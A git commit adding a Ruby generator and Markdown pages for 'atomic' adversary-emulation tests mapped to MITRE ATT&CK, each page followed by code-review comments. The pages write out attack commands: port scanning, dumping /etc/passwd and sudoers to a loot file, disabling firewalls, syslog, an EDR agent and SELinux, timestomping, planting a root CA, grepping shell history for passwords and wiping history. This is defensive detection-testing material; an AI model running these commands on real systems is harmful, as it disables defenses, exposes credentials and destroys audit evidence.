first cut of atomic docs generator

This commit is contained in:
Brian Beyer
2018-05-10 13:26:34 -06:00
parent fddf3ef5b4
commit 92de69a6d5
15 changed files with 643 additions and 0 deletions
+33
@@ -0,0 +1,33 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
<%- if technique['identifier'].start_with? 'T' %>
MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<% end -%>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
### Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'] %>
```
<%- end -%>
<%- end -%>
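Review bot: the Inputs table separator row `|-------------------------------------------|` has a single cell, so Markdown renderers will not treat the four-column header above it as a table; it needs one dashes cell per column, i.e. `| --- | --- | --- | --- |`. Separately, `<%= test['description'] -%>` trims the trailing newline, so in every generated file the description and the `**Supported Platforms:**` line end up on the same line; drop the `-` there or emit a blank line after it, and consider tagging the command fence with the executor name so the snippet gets highlighting.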
+19
@@ -0,0 +1,19 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Scan a bunch of ports to see if they are open
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
for port in {1..65535};
do
echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
done
```
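Review bot: the executor is `sh`, but the loop relies on bash-only features: `{1..65535}` brace expansion and the `/dev/tcp/host/port` pseudo-device. Under a POSIX sh such as dash the body runs once with the literal string `{1..65535}` in `$port` and reports it as closed, so the test silently does nothing. Declare the executor as `bash`, make the hardcoded `192.168.1.1` an input argument with a default, and drop the stray `: ;` after the second `echo`.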
+79
@@ -0,0 +1,79 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - List all accounts
xxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat /etc/passwd > #{output_file}
```
### Test #2 - View sudoers access
xxx (requires root)
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat /etc/sudoers > #{output_file}
```
### Test #3 - View accounts with UID 0
xxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
### Test #4 - List opened files by user
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
### Test #5 - Show if a user account has ever logger in remotely
xxx
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
lastlog > #{output_file}
```
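Review bot: Test #5 writes to `#{output_file}` but declares no Inputs table, so the placeholder has no default and is left unsubstituted in the command (compare Tests #1 to #3, which declare `output_file`); add the same input to Test #5. The descriptions of Tests #1, #3, #4 and #5 are still the `xxx` placeholder, and the Test #5 heading has a typo (`logger in` for `logged in`).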
+75
@@ -0,0 +1,75 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Disable iptables firewall
Disables the iptables firewall
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
chkconfig off iptables
service ip6tables stop
chkconfig off ip6tables
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop firewalld
systemctl disable firewalld
fi
```
### Test #2 - Disable syslog
Disables syslog collection
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
```
### Test #3 - Disable Cb Response
Disable the Cb Response service
**Supported Platforms:** linux
#### Run it with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
```
### Test #4 - Disable SELinux
Disables SELinux enforcement
**Supported Platforms:** linux
#### Run it with `sh`!
```
setenforce 0
```
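Review bot: the `else if [ ... ];` branches in Tests #1 to #3 are not valid sh: `else if` opens a nested `if` that needs its own `then` and a second `fi`, so each block fails to parse and nothing in it runs. Use `elif [ ... ]; then` instead. The `chkconfig off iptables` calls also have the arguments reversed; chkconfig takes the service name first (`chkconfig iptables off`).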
+62
@@ -0,0 +1,62 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Set a file's access timestamp
Stomps on the access timestamp of a file
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
```
### Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
```
### Test #3 - Set a file's creation timestamp
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | |
#### Run it with `sh`!
```
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
date -s "$NOW"
stat #{target_filename}
```
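Review bot: Test #3 lists macos as supported, but `date -s` is a GNU coreutils option that BSD `date` on macOS does not accept, and restoring with `date -s "$NOW"` assumes the default `date` output format is accepted as input. Either limit the test to linux or give the macOS form. The Inputs description in Tests #2 and #3 was copied from Test #1 and still says `last access time` although those tests stomp the modification and creation timestamps.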
+48
@@ -0,0 +1,48 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
#### Run it with `bash`!
```
### TODO: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
echo "This file transferred by scp" > /tmp/adversary-scp
echo "This file transferred by sftp" > /tmp/adversary-sftp
mkdir /tmp/adversary-rsync
cd /tmp/adversary-rsync
touch a b c d e f g
# Victim System Configuration
# Ensure SSH access has been configured for a victim account
# Ensure write access for victim account to this directory
mkdir /tmp/victim-files
cd /tmp/victim-files
# Push files to victim using rsync
rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/
# Pull files from adversary using rsync
rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/
# Push files to victim using scp
scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/
# Pull file from adversary using scp
scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file
# Push files to victim using sftp
sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
# Pull file from adversary using sftp
sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
```
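Review bot: the `### TODO` line at the top of the command block is part of what the executor will run, and the test name and description are still `xxxx`. The hostnames `victim-host` and `adversary-host` and the two account names should be declared as input arguments with defaults rather than baked into the commands, otherwise the test cannot be pointed at a lab host without editing the YAML. Both `mkdir` calls fail on a second run once the directories exist; `mkdir -p` makes the test rerunnable.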
+34
@@ -0,0 +1,34 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - SourceRecorder via Windows command prompt
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** windows
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| output_file | Path to the recording file being captured | Path | test.wma|
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
#### Run it with `command_prompt`!
```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
### Test #2 - PowerShell Cmdlet via Windows command prompt
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
**Supported Platforms:** windows
#### Run it with `command_prompt`!
```
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
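Review bot: `duration_hms` is declared with type `Path` although it is a duration, and its default `30` is not in the `h:m:s` format its own description promises, so the default contradicts the documentation. In Test #2 the command passes the repository name `WindowsAudioDevice-Powershell-Cmdlet` to `-Command`, which is not a cmdlet and fails with a command-not-found error; the test should import the module and call one of its cmdlets.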
+25
@@ -0,0 +1,25 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Install root CA on CentOS/RHEL
Creates a root CA with openssl
**Supported Platforms:** linux
#### Run it with `sh`!
```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
then
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
update-ca-trust
fi
```
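Review bot: the certificate is written to `#{cert_filename}` but the install steps read `rootCA.crt`, so unless `cert_filename` happens to be `rootCA.crt` the append and copy fail. Neither `key_filename` nor `cert_filename` is declared in an Inputs table. The `else if [ ... ];` branch has the same missing `then`/`fi` problem as the other CentOS tests (use `elif`), and the `-le 5` / `-ge 7` conditions leave CentOS 6 unhandled.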
+39
@@ -0,0 +1,39 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Create a user account on a Linux system
Create a user via useradd
**Supported Platforms:** linux
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
### Test #2 - Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
**Supported Platforms:** macos
#### Run it with `bash`!
```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
```
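Review bot: Test #2 uses `#{username}` and `#{realname}` but, unlike Test #1, declares no Inputs table; add both so the placeholders get defaults. `UniqueID "1010"` is hardcoded and collides with an existing account if that UID is already taken, leaving a half-created user; make it an input or pick the next free UID.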
+23
@@ -0,0 +1,23 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - xxxx
xxxx
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
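Review bot: `bash_history_grep_args` is declared with type `Path` but holds grep options; it should be `String`. The test name and description are still `xxxx`. `cat file | grep` can be written as `grep #{bash_history_grep_args} #{bash_history_filename}`, which drops the extra process.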
+78
@@ -0,0 +1,78 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Clear Bash history (rm)
Clears bash history via rm
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
rm ~/.bash_history
```
### Test #2 - Clear Bash history (echo)
Clears bash history via rm
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
echo "" > ~/.bash_history
```
### Test #3 - Clear Bash history (cat dev/null)
Clears bash history via cat /dev/null
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
cat /dev/null > ~/.bash_history
```
### Test #4 - Clear Bash history (ln dev/null)
Clears bash history via a symlink to /dev/null
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
ln -sf /dev/null ~/.bash_history
```
### Test #5 - Clear Bash history (truncate)
Clears bash history via truncate
**Supported Platforms:** linux
#### Run it with `sh`!
```
truncate -s0 ~/.bash_history
```
### Test #6 - Clear history of a bunch of shells
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** linux
#### Run it with `sh`!
```
unset HISTFILE
export HISTFILESIZE=0
history -c
```
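Review bot: the Test #2 description says `via rm` but the command uses `echo`; copy-paste leftover. Test #6 is declared with executor `sh`, but `history -c` is a bash builtin that dash does not provide, and `unset HISTFILE` / `export HISTFILESIZE=0` in the executor's child process do not change the interactive shell whose history the test claims to clear; the executor should be `bash`, and the description should say which shells the test actually covers rather than `a bunch`.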
+22
@@ -0,0 +1,22 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Disable history collection
Disables history collection in shells
**Supported Platforms:** linux, macos
#### Inputs
| Name | Description | Type | Default Value |
|-------------------------------------------|
| evil_command | Command to run after shell history collection is disabled | String | whoami|
#### Run it with `sh`!
```
export HISTCONTROL=ignoreboth
ls #{evil_command}
```
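Review bot: `ls #{evil_command}` passes the command as a filename argument to `ls`, so with the default `whoami` the test runs `ls whoami`, which only reports a missing file and never executes the command whose history entry the test is about. Drop the `ls`. Note also that `HISTCONTROL=ignoreboth` only suppresses entries beginning with a space or duplicating the previous one, so the second line needs a leading space to exercise what the test name describes, and exporting it in the executor's child process does not alter the interactive shell's setting.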
+16
@@ -0,0 +1,16 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Create a hidden file in a hidden directory
Creates a hidden file inside a hidden directory
**Supported Platforms:** linux, macos
#### Run it with `sh`!
```
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
```
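Review bot: both paths are relative to whatever working directory the executor happens to use, so the artifact lands in an unpredictable place, and `mkdir .hidden-directory` fails on a second run once the directory exists. Use an absolute path (or an input argument with a default) and `mkdir -p`.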
+50
@@ -0,0 +1,50 @@
# T1234 - Create Account
MITRE ATT&CK Technique: [T1234](https://attack.mitre.org/wiki/Technique/T1234)
## Atomic Tests
### Test #1 - Chrome (Developer Mode)
xxx
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to [chrome://extensions](chrome://extensions) and
tick 'Developer Mode'.
2. Click 'Load unpacked extension...' and navigate to
[Browser_Extension](../t1176/)
3. Click 'Select'
### Test #2 - Chrome (Chrome Web Store)
xxx
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
### Test #3 - Firefox
Create a file called test.wma, with the duration of 30 seconds
**Supported Platforms:** linux, windows, macos
#### Run it with these steps!
1. Navigate to [about:debugging](about:debugging) and
click "Load Temporary Add-on"
2. Navigate to [manifest.json](./manifest.json)
3. Then click 'Open'
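Review bot: the Test #3 description (`Create a file called test.wma ...`) was copied from the audio-capture test and does not describe loading a Firefox add-on; Tests #1 and #2 still carry the `xxx` placeholder. The relative links `../t1176/` and `./manifest.json` in the manual steps resolve against the location of the generated Markdown file, so they need checking against the final directory layout.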
+40
@@ -0,0 +1,40 @@
#! /usr/bin/env ruby
require 'yaml'
require 'ostruct'
require 'erb'
def generate_docs!(path)
atomic_yaml = YAML.load(File.read path)
technique = {
# TODO GET FROM MITRE
'identifier' => "T1234",
'name' => "Create Account",
}
template = ERB.new File.read("#{File.dirname(__FILE__)}/atomics/atomic_doc_template.md.erb"), nil, "-"
generated_doc = template.result(binding)
output_doc_path = path.gsub(/.yaml/, '.md')
print " => #{output_doc_path} => "
File.write output_doc_path, generated_doc
end
oks = []
fails = []
Dir["#{File.dirname(__FILE__)}/atomics/t*/t*.yaml"].sort.each do |path|
begin
print "Generating docs for #{path}"
generate_docs! path
puts "OK"
rescue => ex
fails << path
puts "FAIL (#{ex} #{ex.backtrace.join("\n")})"
end
end
puts
puts "Generated docs for #{oks.count} techniques, #{fails.count} failures"
exit fails.count
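Review bot: `oks` is declared but never appended to, so the summary always reports `Generated docs for 0 techniques`; push `path` onto `oks` after the `puts "OK"`. `path.gsub(/.yaml/, '.md')` uses an unescaped dot, so any character followed by `yaml` matches, including inside a directory name; anchor it as `/\.yaml\z/`. `YAML.load` instantiates arbitrary Ruby objects from tagged nodes, which matters once atomics are contributed by third parties; prefer `YAML.safe_load`. The hardcoded `T1234` / `Create Account` is already flagged by the TODO and is why every generated file above carries the same heading.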